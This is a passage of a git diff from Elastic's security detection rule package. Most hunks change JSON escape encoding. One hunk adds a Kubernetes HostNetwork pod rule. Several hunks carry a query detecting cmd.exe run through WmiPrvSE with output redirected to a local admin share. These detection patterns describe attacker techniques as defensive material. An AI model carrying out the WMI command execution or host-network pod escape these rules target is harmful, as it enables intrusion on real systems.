b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_203.json b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_203.json new file mode 100644 index 00000000000..3b58320a1a8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_203.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rules detects an attempt to create or modify a pod attached to the host network. HostNetwork allows a pod to use the node network namespace. Doing so gives the pod access to any service running on localhost of the host. An attacker could use this access to snoop on network activity of other pods on the same node or bypass restrictive network policies applied to its given namespace.", + "false_positives": [ + "An administrator or developer may want to use a pod that runs as root and shares the hosts IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\"" + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Pod Created With HostNetwork", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:\"pods\"\n and kubernetes.audit.verb:(\"create\" or \"update\" or \"patch\")\n and kubernetes.audit.requestObject.spec.hostNetwork:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n", + "references": [ + "https://research.nccgroup.com/2021/11/10/detection-engineering-for-kubernetes-clusters/#part3-kubernetes-detections", + "https://kubernetes.io/docs/concepts/security/pod-security-policy/#host-namespaces", + "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.image", + "type": "text" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.hostNetwork", + "type": "boolean" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "12cbf709-69e8-4055-94f9-24314385c27e", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1610", + "name": "Deploy Container", + "reference": "https://attack.mitre.org/techniques/T1610/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 203 + }, + "id": "12cbf709-69e8-4055-94f9-24314385c27e_203", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json index a06193adf6d..6af04606ff2 100644 --- a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json +++ b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_1.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json index 43f6f643097..8751fd8b663 100644 --- a/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json +++ b/packages/security_detection_engine/kibana/security_rule/12de29d4-bbb0-4eef-b687-857e8a163870_2.json @@ -45,7 +45,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json index 2a407c23782..ccf4be131eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_104.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Suspicious Cmd Execution via WMI", "note": "", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json index a7f94a6bfda..da4a0ac83ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_105.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Suspicious Cmd Execution via WMI", "note": "", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json index ff46204db71..73def81936c 100644 --- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_106.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Suspicious Cmd Execution via WMI", "note": "", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json index cb4eb386639..46a227fb95f 100644 --- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_107.json @@ -15,7 +15,7 @@ "license": "Elastic License v2", "name": "Suspicious Cmd Execution via WMI", "note": "", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", "related_integrations": [ { "package": "endpoint", @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json index d6067aa460e..03b184260eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Cmd Execution via WMI", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2\u003e\u00261\", \"1\u003e\")\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", "related_integrations": [ { "package": "endpoint", @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json index 5a6f27d7204..b4f966df3b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_102.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json index 41d9c678ccd..f674603ea5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_103.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json index 7667030e524..64e2a8aeb6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_104.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json index 7d20b49d077..b2017124c4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_105.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json index 4bd2511ccb0..86ba6184271 100644 --- a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_102.json @@ -30,7 +30,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json index 616fd66bbb0..9e48b426fde 100644 --- a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_103.json @@ -30,7 +30,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json index 940d6c25ba6..2a86f3c5dfe 100644 --- a/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/138c5dd5-838b-446e-b1ac-c995c7f8108a_104.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json index d012a452f21..513b9ccb52c 100644 --- a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json +++ b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_1.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json index cbab250ea30..afc3cec325a 100644 --- a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json +++ b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_101.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json index c6f97e30c01..d77e13f6c83 100644 --- a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_102.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json index 24bb9ebd7f0..9534edaabfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json +++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_100.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json index 1f4b4c683a4..64184554835 100644 --- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json +++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json index 33c3cacb585..08523e93ecf 100644 --- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json index 2cafcacdeb1..42dfdf29c13 100644 --- a/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/143cb236-0956-4f42-a706-814bcaa0cf5a_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json index f11774d3b4a..cbc21ca8a9a 100644 --- a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_1.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json index 1fa524ce552..753675ffce7 100644 --- a/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/14dab405-5dd9-450c-8106-72951af2391f_2.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json index 634c36cadaa..4f41c70ed32 100644 --- a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json +++ b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_201.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json index 89eb50bf9e8..83fa245408d 100644 --- a/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json +++ b/packages/security_detection_engine/kibana/security_rule/14de811c-d60f-11ec-9fd7-f661ea17fbce_202.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git 